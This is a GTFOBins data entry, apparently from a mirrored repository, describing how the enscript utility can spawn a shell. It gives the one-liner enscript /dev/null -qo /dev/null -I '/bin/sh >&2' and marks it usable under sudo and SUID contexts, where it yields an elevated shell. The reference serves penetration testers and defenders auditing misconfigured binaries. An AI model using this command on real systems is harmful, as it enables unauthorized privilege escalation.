mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-08 06:56:15 +01:00
12 lines
175 B
Plaintext
12 lines
175 B
Plaintext
---
|
|
functions:
|
|
shell:
|
|
- code: |-
|
|
enscript /dev/null -qo /dev/null -I '/bin/sh >&2'
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
shell: true
|
|
unprivileged:
|
|
...
|